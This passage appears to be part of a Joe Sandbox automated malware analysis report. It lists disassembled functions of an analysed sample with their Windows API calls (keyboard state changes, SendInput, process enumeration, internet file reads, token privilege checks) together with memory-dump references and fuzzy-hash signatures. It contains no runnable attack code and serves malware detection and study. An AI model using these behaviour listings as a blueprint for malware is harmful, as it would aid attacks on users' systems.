                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dd1d94d4a685078dd5690de46a95639ac733edda50dbb6e0e2c5453379e97743
                                                        • Instruction ID: 7cb6a498041ac4ac1b87bdd695cd5c302fa0f82e468e2a43358865386fb04c9b
                                                        • Opcode Fuzzy Hash: dd1d94d4a685078dd5690de46a95639ac733edda50dbb6e0e2c5453379e97743
                                                        • Instruction Fuzzy Hash: D3412B71A00724BFD724AF38DC41BAABBE9EB88710F10556EF551FB292E77199418780
                                                        Function 00E656D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E65783
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00E657A9
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E657CE
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E657FA
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: fa74def217bd7c3146bb0de16f28f5729c4bd5f8e77ef2102610166f354bd204
                                                        • Instruction ID: f1fe58134761a6159ff02556606ad2bc88c23d4cd41abb410ac3c73df556b7a8
                                                        • Opcode Fuzzy Hash: fa74def217bd7c3146bb0de16f28f5729c4bd5f8e77ef2102610166f354bd204
                                                        • Instruction Fuzzy Hash: 02415D35200A15DFCB10DF15C544A6EBBE2EF89320B19C488E94AAF362CB74FD04CBA1
                                                        Function 00E2D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00E182D9,?,00E182D9,?,00000001,?,?,00000001,00E182D9,00E182D9), ref: 00E2D910
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E2D999
                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00E2D9AB
                                                        • __freea.LIBCMT ref: 00E2D9B4
                                                          • Part of subcall function 00E23820: RtlAllocateHeap.NTDLL(00000000,?,00EC1444,?,00E0FDF5,?,?,00DFA976,00000010,00EC1440,00DF13FC,?,00DF13C6,?,00DF1129), ref: 00E23852
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                        • String ID:
                                                        • API String ID: 2652629310-0
                                                        • Opcode ID: 5fa3b696544a97942a72dd04ae5ba95418f49e2685e3ec00ccb1186c4f6716c4
                                                        • Instruction ID: 21bc5993cd25795484714d23bc303c82d8c993a769cb599a1b7083034d55faa7
                                                        • Opcode Fuzzy Hash: 5fa3b696544a97942a72dd04ae5ba95418f49e2685e3ec00ccb1186c4f6716c4
                                                        • Instruction Fuzzy Hash: 1831E072A0021AAFDB24CF65EC85EAE7BA5EB81314B150168FD05E6250E775CD94CBA0
                                                        Function 00E852C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00E85352
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00E85375
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E85382
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E853A8
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$InvalidateMessageRectSend
                                                        • String ID:
                                                        • API String ID: 3340791633-0
                                                        • Opcode ID: 8ee39ae21ed6870691d2ff606f407eae897609cd2c05214ee232a634c95e2af4
                                                        • Instruction ID: 907c4edd2d12214cc5faf5c5c02986ec7bd1da8985ab9ebf65ff205320853a68
                                                        • Opcode Fuzzy Hash: 8ee39ae21ed6870691d2ff606f407eae897609cd2c05214ee232a634c95e2af4
                                                        • Instruction Fuzzy Hash: F631E432A55A08FFEB31AF14CC05FE83761AB05395F586011FA1CB61E5CBB19E40AB52
                                                        Function 00E5AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00E5ABF1
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E5AC0D
                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E5AC74
                                                        • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00E5ACC6
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: bdde7f5fbd44fed418910f713a1059f23ee48af61c4d45c4d677fb9d76594234
                                                        • Instruction ID: 9c6dd96624e117af22d774fd73252a48118b2043713fb5489251083865b60b04
                                                        • Opcode Fuzzy Hash: bdde7f5fbd44fed418910f713a1059f23ee48af61c4d45c4d677fb9d76594234
                                                        • Instruction Fuzzy Hash: 11311830A00218AFEF34CB6588057FAFAA5AB45316F0C6B2AE885761D1D374898D9762
                                                        Function 00E87674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 00E8769A
                                                        • GetWindowRect.USER32(?,?), ref: 00E87710
                                                        • PtInRect.USER32(?,?,00E88B89), ref: 00E87720
                                                        • MessageBeep.USER32(00000000), ref: 00E8778C
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: 900810a96442dbbcff5ddc0c8bf9d4dd88bfc2b8f72e5994f894a749ccbe3944
                                                        • Instruction ID: 17dd72ac03950cfbe600dbcf2891e902e1ad0991388fb3d570d5e76045255c44
                                                        • Opcode Fuzzy Hash: 900810a96442dbbcff5ddc0c8bf9d4dd88bfc2b8f72e5994f894a749ccbe3944
                                                        • Instruction Fuzzy Hash: F741A234605214DFCB01EF59C894EA977F4FB4A305F2850AAE49CBB261D332E946CF90
                                                        Function 00E816DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00E816EB
                                                          • Part of subcall function 00E53A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E53A57
                                                          • Part of subcall function 00E53A3D: GetCurrentThreadId.KERNEL32 ref: 00E53A5E
                                                          • Part of subcall function 00E53A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E525B3), ref: 00E53A65
                                                        • GetCaretPos.USER32(?), ref: 00E816FF
                                                        • ClientToScreen.USER32(00000000,?), ref: 00E8174C
                                                        • GetForegroundWindow.USER32 ref: 00E81752
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: 22ae1bacb925fce928e9f75ec11ab2a2cb5f57438a1125273bcce33e8e551ddb
                                                        • Instruction ID: 89d1ecc206f83ff9adc515c63d8d13a21fae77e2c478d39f03c358a4b4713cb5
                                                        • Opcode Fuzzy Hash: 22ae1bacb925fce928e9f75ec11ab2a2cb5f57438a1125273bcce33e8e551ddb
                                                        • Instruction Fuzzy Hash: 1E313075D00149AFC700EFA9C981CAEBBFDEF49304B5580AAE519E7211DA319E45CBB0
                                                        Function 00E5D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00E5D501
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00E5D50F
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00E5D52F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00E5D5DC
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        • Opcode ID: eef634d47d9b946e45361b70cd768d753771d989f62d3b50de8f90b764f83dfe
                                                        • Instruction ID: e66f9563702df8bc43da13636cda95cced7467a96fdc21ec1c5a4f7519c48a89
                                                        • Opcode Fuzzy Hash: eef634d47d9b946e45361b70cd768d753771d989f62d3b50de8f90b764f83dfe
                                                        • Instruction Fuzzy Hash: 47319E710082049FD310EF54CC85ABFBBF8EF99344F54492DF685921A1EB719A49CBB2
                                                        Function 00E88FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E09BB2
                                                        • GetCursorPos.USER32(?), ref: 00E89001
                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E47711,?,?,?,?,?), ref: 00E89016
                                                        • GetCursorPos.USER32(?), ref: 00E8905E
                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E47711,?,?,?), ref: 00E89094
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                        • String ID:
                                                        • API String ID: 2864067406-0
                                                        • Opcode ID: 1c2d0891defa97fc3ad620d53d44faaaaf0da57e1f9bc83107291c40c2a4378f
                                                        • Instruction ID: e57279aabd998c6eb7360e7b66307f045c478ebc93ed7b0aa7159badb4575585
                                                        • Opcode Fuzzy Hash: 1c2d0891defa97fc3ad620d53d44faaaaf0da57e1f9bc83107291c40c2a4378f
                                                        • Instruction Fuzzy Hash: F821A335A00018EFCB159F95CC58EFA7BB9EF8A350F284065F50E771A2C3759991DB60
                                                        Function 00E5D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,00E8CB68), ref: 00E5D2FB
                                                        • GetLastError.KERNEL32 ref: 00E5D30A
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E5D319
                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E8CB68), ref: 00E5D376
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                        • String ID:
                                                        • API String ID: 2267087916-0
                                                        • Opcode ID: b5a5faaf1e08dada29e5dad28075bf558e9b51029da98af9b9771ae7b212c73a
                                                        • Instruction ID: bbce536e94cc0c4d13ab6809d09218a9fe3b7d0385b6f9d49280dfaa848a1c76
                                                        • Opcode Fuzzy Hash: b5a5faaf1e08dada29e5dad28075bf558e9b51029da98af9b9771ae7b212c73a
                                                        • Instruction Fuzzy Hash: 5D2180705092019F8720DF25D8818AEB7E4EF56369F205E1DF899E72A1D730D94ACBA3
                                                        Function 00E51571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E51014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E5102A
                                                          • Part of subcall function 00E51014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E51036
                                                          • Part of subcall function 00E51014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E51045
                                                          • Part of subcall function 00E51014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E5104C
                                                          • Part of subcall function 00E51014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E51062
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E515BE
                                                        • _memcmp.LIBVCRUNTIME ref: 00E515E1
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E51617
                                                        • HeapFree.KERNEL32(00000000), ref: 00E5161E
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                        • String ID:
                                                        • API String ID: 1592001646-0
                                                        • Opcode ID: 51c87544ea0bc706a621f92183e3ca5b06f589c8ed0438fe58a353251e3cd0db
                                                        • Instruction ID: 136c387994f735d118ba6cd53558c20321284f48f3802c26db9602881ab9f114
                                                        • Opcode Fuzzy Hash: 51c87544ea0bc706a621f92183e3ca5b06f589c8ed0438fe58a353251e3cd0db
                                                        • Instruction Fuzzy Hash: F9218E31E40108EFDF00DFA4C945BEEB7B8EF44345F184899E855B7241E770AA49CB60
                                                        Function 00E82782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00E8280A
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E82824
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E82832
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E82840
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$AttributesLayered
                                                        • String ID:
                                                        • API String ID: 2169480361-0
                                                        • Opcode ID: d827c414f4d2a099f99d4b7c5b28eaf773e5525d731ec83fb957fdc43fc37638
                                                        • Instruction ID: da0b63caca429cff8aec6c9dd83c7d4682b7fbd66b038016e27e25d7b9b1ccdc
                                                        • Opcode Fuzzy Hash: d827c414f4d2a099f99d4b7c5b28eaf773e5525d731ec83fb957fdc43fc37638
                                                        • Instruction Fuzzy Hash: 8F210331204511AFDB18AB25C844FAA7B95EF86324F24815DF52E9B6E2C776FC42C7A0
                                                        Function 00E6CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 00E6CE89
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00E6CEEA
                                                        • SetEvent.KERNEL32(?,?,00000000), ref: 00E6CEFE
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorEventFileInternetLastRead
                                                        • String ID:
                                                        • API String ID: 234945975-0
                                                        • Opcode ID: 22996d174706dd20d61795b2495582bc8282258a499c73630fcd59ff795063b0
                                                        • Instruction ID: fe015d843bbb2ee728abbea42450bd67651d5837637775a6973c49b05df36b06
                                                        • Opcode Fuzzy Hash: 22996d174706dd20d61795b2495582bc8282258a499c73630fcd59ff795063b0
                                                        • Instruction Fuzzy Hash: A121AC716407059FDB209F65E948BB6B7F8EB10398F20541AE686F2151E771EA488B60
                                                        Function 00E578F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E58D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00E5790A,?,000000FF,?,00E58754,00000000,?,0000001C,?,?), ref: 00E58D8C
                                                          • Part of subcall function 00E58D7D: lstrcpyW.KERNEL32(00000000,?,?,00E5790A,?,000000FF,?,00E58754,00000000,?,0000001C,?,?,00000000), ref: 00E58DB2
                                                          • Part of subcall function 00E58D7D: lstrcmpiW.KERNEL32(00000000,?,00E5790A,?,000000FF,?,00E58754,00000000,?,0000001C,?,?), ref: 00E58DE3
                                                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00E58754,00000000,?,0000001C,?,?,00000000), ref: 00E57923
                                                        • lstrcpyW.KERNEL32(00000000,?,?,00E58754,00000000,?,0000001C,?,?,00000000), ref: 00E57949
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E58754,00000000,?,0000001C,?,?,00000000), ref: 00E57984
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        • Opcode ID: 48c2c9590d7fb482c7c5a00256080656938cc099e2dba773db60176063c048be
                                                        • Instruction ID: e91d11a2ddeac5a10575470521b25c746e1dd3989266cd2e006747584ee959f0
                                                        • Opcode Fuzzy Hash: 48c2c9590d7fb482c7c5a00256080656938cc099e2dba773db60176063c048be
                                                        • Instruction Fuzzy Hash: FB11363A200301AFCB209F35D844E7A73F9FF85350B10542AFD86E72A4EB318825C761
                                                        Function 00E87CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00E87D0B
                                                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00E87D2A
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E87D42
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00E6B7AD,00000000), ref: 00E87D6B
                                                          • Part of subcall function 00E09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E09BB2
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID:
                                                        • API String ID: 847901565-0
                                                        • Opcode ID: ade8ca59d735241de9dfdd829d795d9ac1bf64ddd70be73e96eb503a7459bbb5
